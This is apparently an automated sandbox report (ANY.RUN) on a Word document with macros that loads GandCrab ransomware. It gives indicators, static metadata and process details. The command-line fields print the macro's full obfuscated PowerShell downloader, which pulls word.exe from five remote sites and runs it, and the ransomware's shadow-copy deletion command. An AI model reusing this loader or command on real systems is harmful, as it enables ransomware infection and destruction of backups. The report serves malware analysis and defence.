General Info

File name

efe3ece10170155b837ffe7f8b5f51a9bf6b37305f1bcef2f7aaf5d5442e5ea9.doc

Full analysis
https://app.any.run/tasks/76ebae9b-fe5d-4b22-bc84-9eb6f085476b
Verdict
Malicious activity
Analysis date
6/12/2019, 03:45:25
OS:
Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:

macros

macros-on-open

generated-doc

trojan

opendir

loader

ransomware

gandcrab

Indicators:

MIME:
application/vnd.openxmlformats-officedocument.wordprocessingml.document
File info:
Microsoft Word 2007+
MD5

f1a6ff745f5284b57ed54d5a5f0f779b

SHA1

bfca130abce178d9edc0d3d060e6d78cd83b6eae

SHA256

efe3ece10170155b837ffe7f8b5f51a9bf6b37305f1bcef2f7aaf5d5442e5ea9

SSDEEP

768:/dlFUWTXBr+dGr8INgixD6JpPukZq+8sw556/zT8OeNHA917YIcs6xllNMTfNL/y:/L+m2Gr17xD0pPuH+aK3OAbUQ6BeTfN

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distored by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

Software environment set and analysis options

Launch configuration

Task duration
120 seconds
Additional time used
60 seconds
Fakenet option
off
Heavy Evaision option
off
MITM proxy
off
Route via Tor
off
Network geolocation
off
Privacy
Public submission
Autoconfirmation of UAC
on

Software preset

  • Internet Explorer 8.0.7601.17514
  • Adobe Acrobat Reader DC MUI (15.023.20070)
  • Adobe Flash Player 26 ActiveX (26.0.0.131)
  • Adobe Flash Player 26 NPAPI (26.0.0.131)
  • Adobe Flash Player 26 PPAPI (26.0.0.131)
  • Adobe Refresh Manager (1.8.0)
  • CCleaner (5.35)
  • FileZilla Client 3.36.0 (3.36.0)
  • Google Chrome (73.0.3683.75)
  • Google Update Helper (1.3.33.23)
  • Java 8 Update 92 (8.0.920.14)
  • Java Auto Updater (2.8.92.14)
  • Microsoft .NET Framework 4.6.1 (4.6.01055)
  • Microsoft Office Access MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Access Setup Metadata MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Excel MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office OneNote MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Outlook MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office PowerPoint MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Professional 2010 (14.0.6029.1000)
  • Microsoft Office Proof (English) 2010 (14.0.6029.1000)
  • Microsoft Office Proof (French) 2010 (14.0.6029.1000)
  • Microsoft Office Proof (Spanish) 2010 (14.0.6029.1000)
  • Microsoft Office Proofing (English) 2010 (14.0.6029.1000)
  • Microsoft Office Publisher MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Shared MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Shared Setup Metadata MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Single Image 2010 (14.0.6029.1000)
  • Microsoft Office Word MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (9.0.30729.6161)
  • Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (10.0.40219)
  • Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (12.0.30501.0)
  • Microsoft Visual C++ 2013 x86 Additional Runtime - 12.0.21005 (12.0.21005)
  • Microsoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 (12.0.21005)
  • Microsoft Visual C++ 2017 Redistributable (x86) - 14.15.26706 (14.15.26706.0)
  • Microsoft Visual C++ 2017 x86 Additional Runtime - 14.15.26706 (14.15.26706)
  • Microsoft Visual C++ 2017 x86 Minimum Runtime - 14.15.26706 (14.15.26706)
  • Mozilla Firefox 65.0.2 (x86 en-US) (65.0.2)
  • Notepad++ (32-bit x86) (7.5.1)
  • Opera 12.15 (12.15.1748)
  • Skype version 8.29 (8.29)
  • VLC media player (2.2.6)
  • WinRAR 5.60 (32-bit) (5.60.0)

Hotfixes

  • Client LanguagePack Package
  • Client Refresh LanguagePack Package
  • CodecPack Basic Package
  • Foundation Package
  • IE Troubleshooters Package
  • InternetExplorer Optional Package
  • KB2534111
  • KB2999226
  • KB976902
  • LocalPack AU Package
  • LocalPack CA Package
  • LocalPack GB Package
  • LocalPack US Package
  • LocalPack ZA Package
  • ProfessionalEdition
  • UltimateEdition

Behavior activities

MALICIOUS SUSPICIOUS INFO
Deletes shadow copies
  • cmd.exe (PID: 3800)
Changes settings of System certificates
  • 148.exe (PID: 3332)
Connects to CnC server
  • 148.exe (PID: 3332)
Actions looks like stealing of personal data
  • 148.exe (PID: 3332)
Dropped file may contain instructions of ransomware
  • 148.exe (PID: 3332)
Writes file to Word startup folder
  • 148.exe (PID: 3332)
Downloads executable files from the Internet
  • powershell.exe (PID: 252)
Application was dropped or rewritten from another process
  • 148.exe (PID: 3332)
Renames files like Ransomware
  • 148.exe (PID: 3332)
Unusual execution from Microsoft Office
  • WINWORD.EXE (PID: 2716)
Starts CMD.EXE for commands execution
  • WINWORD.EXE (PID: 2716)
GANDCRAB detected
  • 148.exe (PID: 3332)
Starts CMD.EXE for commands execution
  • 148.exe (PID: 3332)
Adds / modifies Windows certificates
  • 148.exe (PID: 3332)
Executed as Windows Service
  • vssvc.exe (PID: 3884)
Creates files in the program directory
  • 148.exe (PID: 3332)
Reads the cookies of Mozilla Firefox
  • 148.exe (PID: 3332)
Executable content was dropped or overwritten
  • powershell.exe (PID: 252)
Creates files in the Windows directory
  • powershell.exe (PID: 252)
Executes PowerShell scripts
  • cmd.exe (PID: 2584)
Removes files from Windows directory
  • powershell.exe (PID: 252)
Creates files in the user directory
  • powershell.exe (PID: 252)
  • 148.exe (PID: 3332)
Dropped object may contain Bitcoin addresses
  • 148.exe (PID: 3332)
  • powershell.exe (PID: 252)
Creates files in the user directory
  • WINWORD.EXE (PID: 2716)
Reads Microsoft Office registry keys
  • WINWORD.EXE (PID: 2716)
Dropped object may contain TOR URL's
  • 148.exe (PID: 3332)

Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report

Static information

TRiD
.docm
|   Word Microsoft Office Open XML Format document (with Macro) (53.6%)
.docx
|   Word Microsoft Office Open XML Format document (24.2%)
.zip
|   Open Packaging Conventions container (18%)
.zip
|   ZIP compressed archive (4.1%)
EXIF
ZIP
ZipRequiredVersion:
20
ZipBitFlag:
0x0006
ZipCompression:
Deflated
ZipModifyDate:
1980:01:01 00:00:00
ZipCRC:
0xc8e48bf2
ZipCompressedSize:
426
ZipUncompressedSize:
1635
ZipFileName:
[Content_Types].xml
XML
Template:
Normal.dotm
TotalEditTime:
null
Pages:
1
Words:
null
Characters:
1
Application:
Microsoft Office Word
DocSecurity:
None
Lines:
1
Paragraphs:
1
ScaleCrop:
No
HeadingPairs
null
null
TitlesOfParts:
null
Company:
null
LinksUpToDate:
No
CharactersWithSpaces:
1
SharedDoc:
No
HyperlinksChanged:
No
AppVersion:
16
Keywords:
null
LastModifiedBy:
Admin
RevisionNumber:
2
CreateDate:
2019:03:22 14:08:00Z
ModifyDate:
2019:03:22 14:08:00Z
XMP
Title:
null
Subject:
null
Creator:
admin
Description:
null

Screenshots

Processes

Total processes
44
Monitored processes
7
Malicious processes
5
Suspicious processes
0

Behavior graph

+
start download and start winword.exe no specs cmd.exe no specs powershell.exe #GANDCRAB 148.exe cmd.exe vssadmin.exe no specs vssvc.exe no specs
Specs description
Program did not start
Integrity level elevation
Task сontains an error or was rebooted
Process has crashed
Task contains several apps running
Executable file was dropped
Debug information is available
Process was injected
Network attacks were detected
Application downloaded the executable file
Actions similar to stealing personal data
Behavior similar to exploiting the vulnerability
Inspected object has sucpicious PE structure
File is detected by antivirus software
CPU overrun
RAM overrun
Process starts the services
Process was added to the startup
Behavior similar to spam
Low-level access to the HDD
Probably Tor was used
System was rebooted
Connects to the network
Known threat

Process information

Click at the process to see the details.

PID
2716
CMD
"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\efe3ece10170155b837ffe7f8b5f51a9bf6b37305f1bcef2f7aaf5d5442e5ea9.doc"
Path
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Indicators
No indicators
Parent process
––
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Microsoft Word
Version
14.0.6024.1000
Modules
Image
c:\program files\microsoft office\office14\winword.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\winsxs\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.6161_none_50934f2ebcb7eb57\msvcr90.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\program files\microsoft office\office14\wwlib.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\program files\microsoft office\office14\gfx.dll
c:\windows\system32\wtsapi32.dll
c:\windows\system32\msimg32.dll
c:\program files\microsoft office\office14\oart.dll
c:\program files\common files\microsoft shared\office14\mso.dll
c:\windows\system32\msi.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\apphelp.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\program files\common files\microsoft shared\office14\cultures\office.odf
c:\program files\microsoft office\office14\1033\wwintl.dll
c:\program files\common files\microsoft shared\office14\1033\msointl.dll
c:\program files\common files\microsoft shared\office14\msores.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\dwmapi.dll
c:\program files\common files\microsoft shared\office14\msptls.dll
c:\windows\system32\uxtheme.dll
c:\program files\common files\microsoft shared\office14\riched20.dll
c:\windows\system32\mscoree.dll
c:\windows\microsoft.net\framework\v4.0.30319\mscoreei.dll
c:\windows\system32\version.dll
c:\windows\microsoft.net\framework\v2.0.50727\mscorwks.dll
c:\program files\common files\microsoft shared\officesoftwareprotectionplatform\osppc.dll
c:\windows\system32\winspool.drv
c:\windows\system32\shell32.dll
c:\windows\system32\powrprof.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\propsys.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\rpcrtremote.dll
c:\windows\system32\msxml6.dll
c:\windows\system32\profapi.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\wininet.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\sspicli.dll
c:\program files\common files\microsoft shared\textconv\wpft532.cnv
c:\program files\common files\microsoft shared\textconv\msconv97.dll
c:\program files\common files\microsoft shared\textconv\wpft632.cnv
c:\program files\common files\microsoft shared\textconv\recovr32.cnv
c:\program files\common files\microsoft shared\textconv\wks9pxy.cnv
c:\windows\system32\userenv.dll
c:\windows\system32\sxs.dll
c:\program files\common files\microsoft shared\office14\1033\alrtintl.dll
c:\progra~1\common~1\micros~1\vba\vba7\vbe7.dll
c:\program files\common files\microsoft shared\office14\usp10.dll
c:\windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\gdiplus.dll
c:\windows\system32\windowscodecs.dll
c:\progra~1\common~1\micros~1\vba\vba7\1033\vbe7intl.dll
c:\windows\system32\fm20.dll
c:\windows\system32\comdlg32.dll
c:\windows\system32\shdocvw.dll
c:\windows\system32\winmm.dll
c:\windows\system32\mscms.dll
c:\windows\system32\icm32.dll
c:\windows\system32\fm20enu.dll
c:\windows\system32\spool\drivers\w32x86\3\unidrvui.dll
c:\windows\system32\spool\drivers\w32x86\3\sendtoonenoteui.dll
c:\windows\system32\spool\drivers\w32x86\3\mxdwdrv.dll
c:\windows\system32\fontsub.dll
c:\windows\system32\prntvpt.dll
c:\program files\microsoft office\office14\msproof7.dll

PID
2584
CMD
c:\\windows\\system32\\cmd /c set p=power&& set s=shell&& call %p%%s% $iY1BROJW = '$RfRtd0V = new-obj-1169307106-20230152160ect -com-1169307106-20230152160obj-1169307106-20230152160ect wsc-1169307106-20230152160ript.she-1169307106-20230152160ll;$jZBv7ym = new-object sys-1169307106-20230152160tem.net.web-1169307106-20230152160client;$fKw3Ia5o = new-object random;$Tnv6rW0T = \"-1169307106-20230152160h-1169307106-20230152160t-1169307106-20230152160t-1169307106-20230152160p-1169307106-20230152160://www.blogs.nwp2.xcut.pl/wp//wp-content/themes/flatonpro/word.exe,-1169307106-20230152160h-1169307106-20230152160t-1169307106-20230152160t-1169307106-20230152160p-1169307106-20230152160://www.oshorainternational.com/wp-content/plugins/wp-db-ajax-made/word.exe,-1169307106-20230152160h-1169307106-20230152160t-1169307106-20230152160t-1169307106-20230152160p-1169307106-20230152160://www.testzagroda.hekko24.pl/word.exe,-1169307106-20230152160h-1169307106-20230152160t-1169307106-20230152160t-1169307106-20230152160p-1169307106-20230152160://www.tehms.com/otieusx/word.exe,-1169307106-20230152160h-1169307106-20230152160t-1169307106-20230152160t-1169307106-20230152160p-1169307106-20230152160://www.mutualamcoop.com.ar/components/word.exe\".spl-1169307106-20230152160it(\",\");$iexgFtl = $fKw3Ia5o.nex-1169307106-20230152160t(1, 65536);$hKtnbisMc = \"c:\win-1169307106-20230152160dows\tem-1169307106-20230152160p\148.ex-1169307106-20230152160e\";for-1169307106-20230152160each($uTCDZJ in $Tnv6rW0T){try{$jZBv7ym.dow-1169307106-20230152160nlo-1169307106-20230152160adf-1169307106-20230152160ile($uTCDZJ.ToS-1169307106-20230152160tring(), $hKtnbisMc);sta-1169307106-20230152160rt-pro-1169307106-20230152160cess $hKtnbisMc;break;}catch{}}'.replace('-1169307106-20230152160', $idzMw);$FP5lQvA = '';iex($iY1BROJW);
Path
c:\windows\system32\cmd.exe
Indicators
No indicators
Parent process
WINWORD.EXE
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Windows Command Processor
Version
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Image
c:\windows\system32\cmd.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\apphelp.dll

PID
252
CMD
powershell $iY1BROJW = '$RfRtd0V = new-obj-1169307106-20230152160ect -com-1169307106-20230152160obj-1169307106-20230152160ect wsc-1169307106-20230152160ript.she-1169307106-20230152160ll;$jZBv7ym = new-object sys-1169307106-20230152160tem.net.web-1169307106-20230152160client;$fKw3Ia5o = new-object random;$Tnv6rW0T = \"-1169307106-20230152160h-1169307106-20230152160t-1169307106-20230152160t-1169307106-20230152160p-1169307106-20230152160://www.blogs.nwp2.xcut.pl/wp//wp-content/themes/flatonpro/word.exe,-1169307106-20230152160h-1169307106-20230152160t-1169307106-20230152160t-1169307106-20230152160p-1169307106-20230152160://www.oshorainternational.com/wp-content/plugins/wp-db-ajax-made/word.exe,-1169307106-20230152160h-1169307106-20230152160t-1169307106-20230152160t-1169307106-20230152160p-1169307106-20230152160://www.testzagroda.hekko24.pl/word.exe,-1169307106-20230152160h-1169307106-20230152160t-1169307106-20230152160t-1169307106-20230152160p-1169307106-20230152160://www.tehms.com/otieusx/word.exe,-1169307106-20230152160h-1169307106-20230152160t-1169307106-20230152160t-1169307106-20230152160p-1169307106-20230152160://www.mutualamcoop.com.ar/components/word.exe\".spl-1169307106-20230152160it(\",\");$iexgFtl = $fKw3Ia5o.nex-1169307106-20230152160t(1, 65536);$hKtnbisMc = \"c:\win-1169307106-20230152160dows\tem-1169307106-20230152160p\148.ex-1169307106-20230152160e\";for-1169307106-20230152160each($uTCDZJ in $Tnv6rW0T){try{$jZBv7ym.dow-1169307106-20230152160nlo-1169307106-20230152160adf-1169307106-20230152160ile($uTCDZJ.ToS-1169307106-20230152160tring(), $hKtnbisMc);sta-1169307106-20230152160rt-pro-1169307106-20230152160cess $hKtnbisMc;break;}catch{}}'.replace('-1169307106-20230152160', $idzMw);$FP5lQvA = '';iex($iY1BROJW);
Path
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Indicators
Parent process
cmd.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Windows PowerShell
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\shell32.dll
c:\windows\system32\userenv.dll
c:\windows\system32\profapi.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\propsys.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\shdocvw.dll
c:\windows\system32\linkinfo.dll
c:\windows\system32\ntshrui.dll
c:\windows\system32\srvcli.dll
c:\windows\system32\cscapi.dll
c:\windows\system32\slc.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\microsoft.net\framework\v4.0.30319\mscoreei.dll
c:\windows\system32\version.dll
c:\windows\microsoft.net\framework\v2.0.50727\mscorwks.dll
c:\windows\winsxs\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.4940_none_d08cc06a442b34fc\msvcr80.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\mscorlib\62a0b3e4b40ec0e8c5cfaa0c8848e64a\mscorlib.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system\9e0a3b9b9f457233a335d7fba8f95419\system.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\4bdde288f147e3b3f2c090ecdf704e6d\microsoft.powershell.consolehost.ni.dll
c:\windows\assembly\gac_msil\system.management.automation\1.0.0.0__31bf3856ad364e35\system.management.automation.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.management.a#\a8e3a41ecbcc4bb1598ed5719f965110\system.management.automation.ni.dll
c:\windows\system32\psapi.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.core\fbc05b5b05dc6366b02b8e2f77d080f1\system.core.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\e112e4460a0c9122de8c382126da4a2f\microsoft.powershell.commands.diagnostics.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.configuratio#\f02737c83305687a68c088927a6c5a98\system.configuration.install.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.wsman.man#\f1865caa683ceb3d12b383a94a35da14\microsoft.wsman.management.ni.dll
c:\windows\assembly\gac_msil\microsoft.wsman.runtime\1.0.0.0__31bf3856ad364e35\microsoft.wsman.runtime.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.transactions\ad18f93fc713db2c4b29b25116c13bd8\system.transactions.ni.dll
c:\windows\assembly\gac_32\system.transactions\2.0.0.0__b77a5c561934e089\system.transactions.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\82d7758f278f47dc4191abab1cb11ce3\microsoft.powershell.commands.utility.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\583c7b9f52114c026088bdb9f19f64e8\microsoft.powershell.commands.management.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\6c5bef3ab74c06a641444eff648c0dde\microsoft.powershell.security.ni.dll
c:\windows\microsoft.net\framework\v2.0.50727\culture.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.xml\461d3b6b3f43e6fbe6c897d5936e17e4\system.xml.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.management\6f3b99ed0b791ff4d8aa52f2f0cd0bcf\system.management.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.directoryser#\45ec12795950a7d54691591c615a9e3c\system.directoryservices.ni.dll
c:\windows\system32\shfolder.dll
c:\windows\system32\secur32.dll
c:\windows\system32\sspicli.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.data\1e85062785e286cd9eae9c26d2c61f73\system.data.ni.dll
c:\windows\assembly\gac_32\system.data\2.0.0.0__b77a5c561934e089\system.data.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\microsoft.net\framework\v2.0.50727\mscorjit.dll
c:\windows\system32\sxs.dll
c:\windows\system32\rpcrtremote.dll
c:\windows\system32\wshom.ocx
c:\windows\system32\mpr.dll
c:\windows\system32\scrrun.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.configuration\bc09ad2d49d8535371845cd7532f9271\system.configuration.ni.dll
c:\windows\system32\rasapi32.dll
c:\windows\system32\rasman.dll
c:\windows\system32\rtutils.dll
c:\windows\system32\mswsock.dll
c:\windows\system32\wshtcpip.dll
c:\windows\system32\wship6.dll
c:\windows\system32\winhttp.dll
c:\windows\system32\webio.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\dhcpcsvc6.dll
c:\windows\system32\dhcpcsvc.dll
c:\windows\system32\dnsapi.dll
c:\windows\system32\rasadhlp.dll
c:\windows\system32\fwpuclnt.dll
c:\windows\microsoft.net\framework\v2.0.50727\diasymreader.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\wininet.dll
c:\windows\system32\iertutil.dll
c:\windows\temp\148.exe
c:\windows\system32\netutils.dll

PID
3332
CMD
"C:\windows\temp\148.exe"
Path
C:\windows\temp\148.exe
Indicators
Parent process
powershell.exe
User
admin
Integrity Level
MEDIUM
Version:
Company
Christian Foltin
Description
Attributable Updating Assigned Stairs
Version
Modules
Image
c:\windows\temp\148.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\comdlg32.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\shell32.dll
c:\windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\gdiplus.dll
c:\windows\system32\ole32.dll
c:\windows\system32\psapi.dll
c:\windows\system32\msacm32.dll
c:\windows\system32\winmm.dll
c:\windows\system32\version.dll
c:\windows\system32\opengl32.dll
c:\windows\system32\glu32.dll
c:\windows\system32\ddraw.dll
c:\windows\system32\dciman32.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\dwmapi.dll
c:\windows\system32\uxtheme.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\userenv.dll
c:\windows\system32\profapi.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\clbcatq.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\propsys.dll
c:\windows\system32\ntkrnlpa.exe
c:\windows\system32\kbdus.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\mpr.dll
c:\windows\system32\drprov.dll
c:\windows\system32\winsta.dll
c:\windows\system32\ntlanman.dll
c:\windows\system32\davclnt.dll
c:\windows\system32\davhlpr.dll
c:\windows\system32\wkscli.dll
c:\windows\system32\cscapi.dll
c:\windows\system32\netutils.dll
c:\windows\system32\browcli.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\wininet.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\dnsapi.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\normaliz.dll
c:\windows\system32\rasapi32.dll
c:\windows\system32\rasman.dll
c:\windows\system32\rtutils.dll
c:\windows\system32\sensapi.dll
c:\windows\system32\nlaapi.dll
c:\windows\system32\rasadhlp.dll
c:\windows\system32\napinsp.dll
c:\windows\system32\pnrpnsp.dll
c:\windows\system32\mswsock.dll
c:\windows\system32\winrnr.dll
c:\windows\system32\wshtcpip.dll
c:\windows\system32\wship6.dll
c:\windows\system32\fwpuclnt.dll
c:\windows\system32\netprofm.dll
c:\windows\system32\dhcpcsvc.dll
c:\windows\system32\dhcpcsvc6.dll
c:\windows\system32\wintrust.dll
c:\windows\system32\schannel.dll
c:\windows\system32\credssp.dll
c:\windows\system32\secur32.dll
c:\windows\system32\ncrypt.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\bcryptprimitives.dll
c:\windows\system32\gpapi.dll

PID
3800
CMD
"C:\Windows\system32\cmd.exe" /c vssadmin delete shadows /all /quiet
Path
C:\Windows\system32\cmd.exe
Indicators
Parent process
148.exe
User
SYSTEM
Integrity Level
SYSTEM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Windows Command Processor
Version
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Image
c:\windows\system32\cmd.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\vssadmin.exe

PID
2140
CMD
vssadmin delete shadows /all /quiet
Path
C:\Windows\system32\vssadmin.exe
Indicators
No indicators
Parent process
cmd.exe
User
SYSTEM
Integrity Level
SYSTEM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Command Line Interface for Microsoft® Volume Shadow Copy Service
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\vssadmin.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\vsstrace.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\vssapi.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\rpcrtremote.dll
c:\windows\system32\vss_ps.dll

PID
3884
CMD
C:\Windows\system32\vssvc.exe
Path
C:\Windows\system32\vssvc.exe
Indicators
No indicators
Parent process
––
User
SYSTEM
Integrity Level
SYSTEM
Version:
Company
Microsoft Corporation
Description
Microsoft® Volume Shadow Copy Service
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\vssvc.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\atl.dll
c:\windows\system32\ole32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\oleaut32.dll
